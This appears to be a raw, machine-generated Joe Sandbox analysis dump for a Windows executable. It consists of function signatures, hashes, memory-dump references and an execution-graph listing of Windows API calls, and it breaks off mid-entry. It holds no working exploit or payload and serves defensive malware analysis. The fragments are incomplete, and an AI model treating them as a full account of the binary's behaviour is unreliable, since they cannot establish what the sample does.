                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsDevice$Release
                                                                                  • String ID:
                                                                                  • API String ID: 1035833867-0
                                                                                  • Opcode ID: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                                                                                  • Instruction ID: 14b76c44c8eaceeaeee324bdb5a85dcfd9d7db7f9075693a9786a0e267a0f47f
                                                                                  • Opcode Fuzzy Hash: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                                                                                  • Instruction Fuzzy Hash: C7E01260E09B0686FF1C7B716859936A690BF48741F8C84BAD81F46360ED3DE085C760
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID: DXGIDebug.dll
                                                                                  • API String ID: 3668304517-540382549
                                                                                  • Opcode ID: 542befb6cfa6d10c523847148554f6d067076e635e2560feee388be7f8acc3cf
                                                                                  • Instruction ID: e475929fc9bd7efb0cbe4475a476cfc582f5f6c381e0c7aa7a52e620046d33e9
                                                                                  • Opcode Fuzzy Hash: 542befb6cfa6d10c523847148554f6d067076e635e2560feee388be7f8acc3cf
                                                                                  • Instruction Fuzzy Hash: C071CC72A14B8186EB14DBA5E4407ADB3A9FF54794F884236DBAC03B95DF38D462C350
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                  • String ID: e+000$gfff
                                                                                  • API String ID: 3215553584-3030954782
                                                                                  • Opcode ID: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                                                                                  • Instruction ID: 07e25dcf3bba6bfcaa36bce3a5c0fdc777706aa486fa17e9eae9f6f7f6d4dd2f
                                                                                  • Opcode Fuzzy Hash: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                                                                                  • Instruction Fuzzy Hash: 52512662B187C146FBA59B759840B6DAA91AF80B90F8C82B1C6DC87BD6CF3CD446C710
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                                                  • String ID: SIZE
                                                                                  • API String ID: 449872665-3243624926
                                                                                  • Opcode ID: a0d5e285fbaa1ac9608f05ebcc1ead8385210100eac4b181d702dbb234701be4
                                                                                  • Instruction ID: aac6ca5cf01575715dc1b640617019c11f337291f252744f94b36ec032e97f53
                                                                                  • Opcode Fuzzy Hash: a0d5e285fbaa1ac9608f05ebcc1ead8385210100eac4b181d702dbb234701be4
                                                                                  • Instruction Fuzzy Hash: 75413572A1878685FE50EBA4E440BFDA350EF85390F884371EA9D026D6EF3CD946C710
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                  • String ID: C:\Users\user\Desktop\file.exe
                                                                                  • API String ID: 3307058713-517116171
                                                                                  • Opcode ID: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
                                                                                  • Instruction ID: 1d5e5b4318cb68c66af528d6efed804b15001252be61b230207984992f28f93b
                                                                                  • Opcode Fuzzy Hash: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
                                                                                  • Instruction Fuzzy Hash: D9418472A08A5286FB94BFA5A4408BDF794FF44794BC84075E98D47B45DE3DE442C360
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemText$DialogWindow
                                                                                  • String ID: ASKNEXTVOL
                                                                                  • API String ID: 445417207-3402441367
                                                                                  • Opcode ID: 97ebd98f0834f70bd8f3ada112357d921bc9d5e9383391aa045354938bfaeae3
                                                                                  • Instruction ID: c676dbc984c86deb79d01bd420a3bcf0b0d19118ee4e30d3bf9adeb8bb9b6e62
                                                                                  • Opcode Fuzzy Hash: 97ebd98f0834f70bd8f3ada112357d921bc9d5e9383391aa045354938bfaeae3
                                                                                  • Instruction Fuzzy Hash: EE419721A0CA8285FA11BB92E454AB9E3A1BF85BC0F9C00B5EE4D07795DE3DD45683A0
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide_snwprintf
                                                                                  • String ID: $%s$@%s
                                                                                  • API String ID: 2650857296-834177443
                                                                                  • Opcode ID: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                                                                                  • Instruction ID: ab7df4e1e9032d23e9a5cfae638a56da941117bc523f1096a4f39c70b8da9ae1
                                                                                  • Opcode Fuzzy Hash: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                                                                                  • Instruction Fuzzy Hash: 9431D272B18B4A85FA50EFA6E440AE9A3A0FF54784F880076DE4C07795DF3CE906C710
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileHandleType
                                                                                  • String ID: @
                                                                                  • API String ID: 3000768030-2766056989
                                                                                  • Opcode ID: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
                                                                                  • Instruction ID: 5833f4826e6b8411df2a7de9f4a5834e2ec41179f1aac28c7215884f7f19b891
                                                                                  • Opcode Fuzzy Hash: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
                                                                                  • Instruction Fuzzy Hash: 1321C822A08B4241FBB0AB649490538A651EF45B74F6C5375D6AF077D5CE3CF882C350
                                                                                  APIs
                                                                                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF75AAD1D3E), ref: 00007FF75AAD40BC
                                                                                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF75AAD1D3E), ref: 00007FF75AAD4102
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                  • String ID: csm
                                                                                  • API String ID: 2573137834-1018135373
                                                                                  • Opcode ID: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                                                                                  • Instruction ID: f309290aa9dd56b6d065a747ded9e69935148a5246606c845e90b321dd0db17c
                                                                                  • Opcode Fuzzy Hash: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                                                                                  • Instruction Fuzzy Hash: 8D112B32608B4182EBA09B25E440669B7E1FB88B94F5C4275DFCD07B58DF3CD556C710
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF75AABE95F,?,?,?,00007FF75AAB463A,?,?,?), ref: 00007FF75AABEA63
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF75AABE95F,?,?,?,00007FF75AAB463A,?,?,?), ref: 00007FF75AABEA6E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastObjectSingleWait
                                                                                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                  • API String ID: 1211598281-2248577382
                                                                                  • Opcode ID: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
                                                                                  • Instruction ID: 15035619798c4b6ea4b770b1f0dc207d4d817a2158f624d21072a503b0654623
                                                                                  • Opcode Fuzzy Hash: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
                                                                                  • Instruction Fuzzy Hash: 02E01A65E1994281F610B7A4AC52C78F6507F74770FD803B4D03E411E1EE6CAD478360
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2044807488.00007FF75AAA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75AAA0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2044781807.00007FF75AAA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044889856.00007FF75AAE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AAFB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044923292.00007FF75AB04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2044968635.00007FF75AB0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ff75aaa0000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FindHandleModuleResource
                                                                                  • String ID: RTL
                                                                                  • API String ID: 3537982541-834975271
                                                                                  • Opcode ID: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                                                                                  • Instruction ID: ecc32bf055387754e1ff5acb53df2b62ce5ff052956434366c8bac67bdddc4e0
                                                                                  • Opcode Fuzzy Hash: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                                                                                  • Instruction Fuzzy Hash: 66D05EA1F0970682FF196BF5A449B7596505F2CB41FCC40BCC80E06394EE2CD58AC7A0

                                                                                  Execution Graph

                                                                                  Execution Coverage:5.3%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:15.1%
                                                                                  Total number of Nodes:2000
                                                                                  Total number of Limit Nodes:107
                                                                                  execution_graph 72271 11108d30 72314 1110f420 72271->72314 72274 11108da9 OpenEventA 72277 11108ed1 GetStockObject GetObjectA InitializeCriticalSection InitializeCriticalSection 72274->72277 72278 11108e18 CloseHandle GetSystemDirectoryA 72274->72278 72279 1110f420 std::_Mutex::_Mutex 265 API calls 72277->72279 72280 11108e38 72278->72280 72281 11108f23 72279->72281 72280->72280 72282 11108e40 LoadLibraryA 72280->72282 72283 11108f3c 72281->72283 72391 110f4680 268 API calls std::_Mutex::_Mutex 72281->72391 72282->72277 72284 11108e71 72282->72284 72342 1110f2b0 72283->72342 72358 111450a0 72284->72358 72288 11108e7b 72290 11108e82 GetProcAddress 72288->72290 72291 11108e9a GetProcAddress 72288->72291 72290->72291 72293 11108ec4 FreeLibrary 72291->72293 72294 11108eb6 72291->72294 72293->72277 72294->72277 72296 11109005 72394 11161d01 72296->72394 72298 1110f420 std::_Mutex::_Mutex 265 API calls 72300 11108f73 72298->72300 72299 1110901f 72301 11108f84 72300->72301 72302 11108f8d 72300->72302 72392 110f4680 268 API calls std::_Mutex::_Mutex 72301->72392 72304 1110f2b0 424 API calls 72302->72304 72305 11108fa9 CloseHandle 72304->72305 72306 111450a0 std::_Mutex::_Mutex 90 API calls 72305->72306 72307 11108fba 72306->72307 72307->72296 72308 1110f420 std::_Mutex::_Mutex 265 API calls 72307->72308 72309 11108fc8 72308->72309 72310 11108fe2 72309->72310 72393 110f4680 268 API calls std::_Mutex::_Mutex 72309->72393 72312 1110f2b0 424 API calls 72310->72312 72313 11108ffe CloseHandle 72312->72313 72313->72296 72402 11162b51 72314->72402 72317 1110f473 _memset 72321 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 72317->72321 72318 1110f447 wsprintfA 72419 11029450 265 API calls 2 library calls 72318->72419 72322 11108d91 72321->72322 72322->72274 72323 11107290 72322->72323 72428 1110f520 72323->72428 72326 1110f520 3 API calls 72327 111072dc 72326->72327 72328 1110f520 3 API calls 72327->72328 72329 111072ee 72328->72329 72330 1110f520 3 API calls 72329->72330 72331 111072ff 72330->72331 72332 1110f520 3 API calls 72331->72332 72333 11107310 72332->72333 72334 1110f420 std::_Mutex::_Mutex 265 API calls 72333->72334 72335 11107321 72334->72335 72336 1110740a 72335->72336 72337 1110732c LoadLibraryA LoadLibraryA 72335->72337 72435 1116219a 66 API calls std::exception::_Copy_str 72336->72435 72337->72274 72339 11107419 72436 111625f1 RaiseException 72339->72436 72341 1110742e 72343 1110f2d0 CreateThread 72342->72343 72344 1110f2bf CreateEventA 72342->72344 72346 1110f2f6 72343->72346 72347 1110f30d 72343->72347 72440 11102c50 72343->72440 72462 1110fde0 72343->72462 72476 11027270 72343->72476 72501 1102c410 72343->72501 72344->72343 72439 11029450 265 API calls 2 library calls 72346->72439 72349 1110f311 WaitForSingleObject CloseHandle 72347->72349 72350 11108f58 CloseHandle 72347->72350 72349->72350 72352 1109e9e0 72350->72352 72353 1109e9ef GetCurrentProcess OpenProcessToken 72352->72353 72354 1109ea2d 72352->72354 72353->72354 72355 1109ea12 72353->72355 72354->72296 72354->72298 72893 1109e910 72355->72893 72357 1109ea1b CloseHandle 72357->72354 72359 111450c1 GetVersionExA 72358->72359 72368 1114529c 72358->72368 72360 111450e3 72359->72360 72359->72368 72362 111450f0 RegOpenKeyExA 72360->72362 72360->72368 72361 111452a5 72363 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 72361->72363 72364 1114511d _memset 72362->72364 72362->72368 72365 111452b2 72363->72365 72906 11143000 RegQueryValueExA 72364->72906 72365->72288 72366 11145304 72367 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 72366->72367 72369 11145314 72367->72369 72368->72361 72368->72366 72917 11081c60 72368->72917 72369->72288 72373 111452ec 72373->72361 72376 11162de7 std::_Mutex::_Mutex 79 API calls 72373->72376 72374 11143000 std::_Mutex::_Mutex RegQueryValueExA 72375 11145189 72374->72375 72377 1114528f RegCloseKey 72375->72377 72908 11162de7 72375->72908 72378 111452fd 72376->72378 72377->72368 72378->72361 72378->72366 72382 111451ad 72383 111451c6 72382->72383 72384 11163a2d std::_Mutex::_Mutex 79 API calls 72382->72384 72385 11162de7 std::_Mutex::_Mutex 79 API calls 72383->72385 72384->72382 72387 111451d2 _strncpy 72385->72387 72386 11145271 72386->72377 72387->72386 72388 11143000 std::_Mutex::_Mutex RegQueryValueExA 72387->72388 72389 11145248 72388->72389 72390 11143000 std::_Mutex::_Mutex RegQueryValueExA 72389->72390 72390->72386 72391->72283 72392->72302 72393->72310 72395 11161d0b IsDebuggerPresent 72394->72395 72396 11161d09 72394->72396 73065 11177637 72395->73065 72396->72299 72399 1116bc99 SetUnhandledExceptionFilter UnhandledExceptionFilter 72400 1116bcb6 __call_reportfault 72399->72400 72401 1116bcbe GetCurrentProcess TerminateProcess 72399->72401 72400->72401 72401->72299 72403 11162bce 72402->72403 72409 11162b5f 72402->72409 72426 1116d4a8 DecodePointer 72403->72426 72405 11162bd4 72427 111692ef 66 API calls __getptd_noexit 72405->72427 72408 11162b8d RtlAllocateHeap 72408->72409 72418 1110f43e 72408->72418 72409->72408 72411 11162bba 72409->72411 72412 11162b6a 72409->72412 72416 11162bb8 72409->72416 72423 1116d4a8 DecodePointer 72409->72423 72424 111692ef 66 API calls __getptd_noexit 72411->72424 72412->72409 72420 1116d99d 66 API calls 2 library calls 72412->72420 72421 1116d7ee 66 API calls 7 library calls 72412->72421 72422 1116d52d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 72412->72422 72425 111692ef 66 API calls __getptd_noexit 72416->72425 72418->72317 72418->72318 72420->72412 72421->72412 72423->72409 72424->72416 72425->72418 72426->72405 72427->72418 72429 1110f536 CreateEventA 72428->72429 72430 1110f549 72428->72430 72429->72430 72431 1110f557 72430->72431 72437 1110f260 InterlockedIncrement 72430->72437 72433 111072cc 72431->72433 72438 1110f3c0 InterlockedIncrement 72431->72438 72433->72326 72435->72339 72436->72341 72437->72431 72438->72433 72536 11089280 72440->72536 72442 11102c5d 72443 11102c69 GetCurrentThreadId GetThreadDesktop OpenDesktopA 72442->72443 72444 11102ccf GetLastError 72443->72444 72445 11102c8f SetThreadDesktop 72443->72445 72446 11146450 std::_Mutex::_Mutex 21 API calls 72444->72446 72447 11102cb1 GetLastError 72445->72447 72448 11102c9a 72445->72448 72450 11102ce1 72446->72450 72449 11146450 std::_Mutex::_Mutex 21 API calls 72447->72449 72547 11146450 72448->72547 72452 11102cc3 CloseDesktop 72449->72452 72541 11102bd0 72450->72541 72452->72450 72455 11102ceb 72553 1110f340 72455->72553 72457 11102cf2 72558 110f4740 16 API calls 72457->72558 72459 11102cf9 72559 1110f370 SetEvent PulseEvent 72459->72559 72461 11102d00 std::ios_base::_Ios_base_dtor 72612 110b7a20 72462->72612 72464 1110fdee GetCurrentThreadId 72465 1110f340 266 API calls 72464->72465 72466 1110fe09 std::ios_base::_Ios_base_dtor 72465->72466 72467 1110fe80 72466->72467 72469 1110fe20 WaitForSingleObject 72466->72469 72472 1110fe43 72466->72472 72615 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Ios_base_dtor 72466->72615 72616 1110f370 SetEvent PulseEvent 72467->72616 72614 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Ios_base_dtor 72469->72614 72470 1110fe8a 72473 1110fe53 PostMessageA 72472->72473 72474 1110fe58 PostThreadMessageA 72472->72474 72473->72466 72474->72466 72477 110272a2 72476->72477 72478 11089280 5 API calls 72477->72478 72479 110272a9 CreateEventA 72478->72479 72480 1110f420 std::_Mutex::_Mutex 265 API calls 72479->72480 72481 110272c6 72480->72481 72482 110272e7 72481->72482 72617 111100d0 72481->72617 72484 1110f340 266 API calls 72482->72484 72497 110272ff 72484->72497 72485 11027316 WaitForMultipleObjects 72486 1102732d 72485->72486 72485->72497 72488 11027336 PostMessageA 72486->72488 72489 1102734a SetEvent Sleep 72486->72489 72487 110273f4 72490 1102740e CloseHandle 72487->72490 72646 1110fc70 278 API calls 2 library calls 72487->72646 72488->72489 72488->72497 72489->72497 72647 1110f370 SetEvent PulseEvent 72490->72647 72491 11027375 PostMessageA 72491->72497 72494 11027405 std::ios_base::_Ios_base_dtor 72494->72490 72495 11027423 72497->72485 72497->72487 72497->72491 72498 110273ba GetCurrentThreadId GetThreadDesktop 72497->72498 72645 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 72497->72645 72498->72497 72499 110273c9 SetThreadDesktop 72498->72499 72499->72497 72500 110273d4 CloseDesktop 72499->72500 72500->72497 72502 1102c442 72501->72502 72503 1110f340 266 API calls 72502->72503 72504 1102c44f WaitForSingleObject 72503->72504 72505 1102c466 72504->72505 72506 1102c67d 72504->72506 72507 1102c470 GetTickCount 72505->72507 72508 1102c666 WaitForSingleObject 72505->72508 72745 1110f370 SetEvent PulseEvent 72506->72745 72651 110d1550 72507->72651 72508->72505 72508->72506 72510 1102c684 CloseHandle 72746 1110f580 InterlockedDecrement SetEvent PulseEvent InterlockedDecrement CloseHandle 72510->72746 72513 1102c695 std::ios_base::_Ios_base_dtor 72514 110d1550 268 API calls 72525 1102c486 72514->72525 72516 1102c6b4 72747 11029450 265 API calls 2 library calls 72516->72747 72518 1102c6c8 72748 11029450 265 API calls 2 library calls 72518->72748 72520 1102c6dc 72749 11029450 265 API calls 2 library calls 72520->72749 72523 1102c6f0 72750 11029450 265 API calls 2 library calls 72523->72750 72524 1102c574 GetTickCount 72532 1102c571 std::ios_base::_Ios_base_dtor 72524->72532 72525->72514 72525->72516 72525->72518 72525->72520 72525->72524 72661 110d0710 72525->72661 72673 11029590 LoadLibraryA 72525->72673 72725 110d1370 269 API calls 2 library calls 72525->72725 72529 11146450 std::_Mutex::_Mutex 21 API calls 72529->72532 72530 110d07c0 265 API calls 72530->72532 72532->72516 72532->72518 72532->72523 72532->72524 72532->72529 72532->72530 72535 110679c0 298 API calls 72532->72535 72726 11142290 72532->72726 72735 11042530 267 API calls 2 library calls 72532->72735 72736 110d07c0 72532->72736 72535->72532 72560 1110f6c0 72536->72560 72538 11089290 72539 110892b3 72538->72539 72540 110892a2 UnhookWindowsHookEx 72538->72540 72539->72442 72540->72539 72542 1110f420 std::_Mutex::_Mutex 265 API calls 72541->72542 72543 11102bfd 72542->72543 72544 11102c30 72543->72544 72566 11102ab0 72543->72566 72544->72455 72546 11102c1d 72546->72455 72548 11146461 72547->72548 72549 1114645c 72547->72549 72586 111458f0 72548->72586 72589 